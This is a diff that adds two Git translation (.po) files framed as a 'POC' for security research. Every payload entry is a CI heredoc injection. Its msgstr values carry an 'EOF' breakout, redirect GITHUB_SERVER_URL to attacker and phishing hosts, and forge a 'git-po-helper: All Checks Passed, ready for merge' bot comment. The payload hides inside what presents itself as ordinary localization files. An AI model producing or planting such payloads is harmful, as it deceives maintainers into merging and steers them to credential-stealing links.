l10n: Add POC translation files for security research

po/l10n-inject.po

@@ -0,0 +1,44 @@
+# Heredoc Injection POC - Alternative approach
+# This file uses various techniques to get git-po-helper to echo malicious content
+
+msgid ""
+msgstr ""
+"Project-Id-Version: Git\n"
+"Report-Msgid-Bugs-To: Git Mailing List <git@vger.kernel.org>\n"
+"POT-Creation-Date: 2024-01-20 00:00+0000\n"
+"PO-Revision-Date: 2024-01-20 00:00+0000\n"
+"Last-Translator: POC <poc@example.com>\n"
+"Language-Team: POC\n"
+"Language: xx\n"
+"MIME-Version: 1.0\n"
+"Content-Type: text/plain; charset=UTF-8\n"
+"Content-Transfer-Encoding: 8bit\n"
+"Plural-Forms: nplurals=2; plural=(n != 1);\n"
+
+#: builtin/add.c:123
+msgid "pathspec '%s' did not match any files"
+msgstr "pathspec '%s' did not match - ERROR DETAILS:
+EOF
+GITHUB_SERVER_URL=https://github-actions-log.evil.example
+COMMENT_BODY=## ✅ git-po-helper: All Checks Passed
+
+Your translation updates look great! No issues were found.
+
+| Check | Status |
+|-------|--------|
+| Format strings | ✅ Passed |
+| Encoding | ✅ Passed |
+| Syntax | ✅ Passed |
+
+**This PR is ready for review and merge.**
+
+---
+_Automated validation by git-po-helper_
+PAYLOAD_MARKER=injection_successful"
+
+#: another entry with format mismatch to ensure error output
+msgid "cannot open '%s'"
+msgstr "cannot open '%s' - debug info follows
+EOF
+GITHUB_SERVER_URL=https://steal-creds.attacker.example
+COMMENT_BODY=Validation complete. Click the workflow link above for details."

po/poc.po

@@ -0,0 +1,53 @@
+# POC Translation File for Heredoc Injection
+# Language: poc
+# MIME-Version: 1.0
+# Content-Type: text/plain; charset=UTF-8
+# Content-Transfer-Encoding: 8bit
+
+# This file is intentionally malformed to trigger git-po-helper errors
+# The error output will contain our injection payload
+
+msgid ""
+msgstr ""
+"Project-Id-Version: Git\n"
+"Report-Msgid-Bugs-To: Git Mailing List <git@vger.kernel.org>\n"
+"POT-Creation-Date: 2024-01-01 00:00+0000\n"
+"PO-Revision-Date: 2024-01-01 00:00+0000\n"
+"Last-Translator: Security Researcher <security@example.com>\n"
+"Language-Team: POC\n"
+"Language: poc\n"
+"MIME-Version: 1.0\n"
+"Content-Type: text/plain; charset=UTF-8\n"
+"Content-Transfer-Encoding: 8bit\n"
+
+# Malicious translation entry
+# The msgstr contains a format specifier mismatch that git-po-helper will report
+# When it reports the error, it will include the content which breaks the heredoc
+
+msgid "cannot %s"
+msgstr "cannot %s %s EOF
+GITHUB_SERVER_URL=https://github-workflow-run.attacker.example
+COMMENT_BODY=## ✅ Translation Check Passed
+
+All translations have been validated successfully.
+
+**Status:** Ready for merge
+
+_Automated check by git-po-helper_
+INJECTED_VAR=poc_successful"
+
+# Another approach - using multiline with explicit newlines
+msgid "Checking out '%s'"
+msgstr ""
+"Translation with injection payload\n"
+"EOF\n"
+"GITHUB_SERVER_URL=https://fake-github.attacker.example\n"
+"COMMENT_BODY=Looks good!\n"
+
+# Invalid plural forms to trigger errors
+msgid "one file"
+msgid_plural "%d files"
+msgstr[0] "EOF
+GITHUB_SERVER_URL=https://phishing-site.example
+COMMENT_BODY=No issues found"
+msgstr[1] "%d fichiers"